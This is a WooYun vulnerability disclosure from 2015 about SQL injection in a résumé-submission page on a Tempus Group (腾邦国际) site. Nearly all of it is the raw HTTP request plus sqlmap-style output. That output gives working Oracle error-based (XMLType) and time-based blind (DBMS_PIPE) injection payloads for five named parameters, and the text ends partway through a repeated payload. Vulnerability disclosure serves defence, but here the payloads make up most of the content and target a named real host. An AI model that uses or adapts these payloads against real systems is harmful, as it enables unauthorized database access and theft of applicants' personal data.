腾邦国际某站多处SQL注入大量数据库DBA权限2

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117801

漏洞标题：腾邦国际某站多处SQL注入大量数据库DBA权限2

漏洞作者：路人甲

提交时间：2015-06-03 09:11

修复时间：2015-07-20 14:22

公开时间：2015-07-20 14:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-03：细节已通知厂商并且等待厂商处理中
2015-06-05：厂商已经确认，细节仅向厂商公开
2015-06-15：细节向核心白帽子及相关领域专家公开
2015-06-25：细节向普通白帽子公开
2015-07-05：细节向实习白帽子公开
2015-07-20：细节向公众公开

简要描述：

233

详细说明：

POST /pw/job2/UI/resume_trace.aspx?type=3 HTTP/1.1
Host: group.tempus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://group.tempus.cn/pw/job2/UI/resume_trace.aspx?type=3
Cookie: ASPSESSIONIDSABBCSTQ=MKFNNNFCJAEFGAEMEGDCHGCB; cck_lasttime=1433235989419; cck_count=0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------643024530396
Content-Length: 2216
-----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1¤3ìê|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
ìá???úèY
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--

漏洞证明：

requests:
---
Parameter: MULTIPART details ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'uqLE' FROM DUAL WHERE 4248=4248 AND 2975=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2975=2975) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'oAQB' FROM DUAL WHERE 9489=9489 AND 5017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(72)||CHR(79)||CHR(108),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: type (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: type=3'||(SELECT 'pVJN' FROM DUAL WHERE 5132=5132 AND 8870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8870=8870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: type=3'||(SELECT 'MWEP' FROM DUAL WHERE 8072=8072 AND 6755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(80)||CHR(121),5))||'
Parameter: MULTIPART names ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'vYVe' FROM DUAL WHERE 1452=1452 AND 9762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9762=9762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'ekop' FROM DUAL WHERE 6976=6976 AND 4438=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(76)||CHR(68)||CHR(119),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone1 ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'dmzn' FROM DUAL WHERE 8179=8179 AND 3342=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3342=3342) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'kbgB' FROM DUAL WHERE 8921=8921 AND 9828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(113)||CHR(113)||CHR(84),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'NHOb' FROM DUAL WHERE 2799=2799 AND 5308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5308=5308) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'Qppd' FROM DUAL WHERE 6183=6183 AND 6041=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(81)||CHR(82)||CHR(65),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
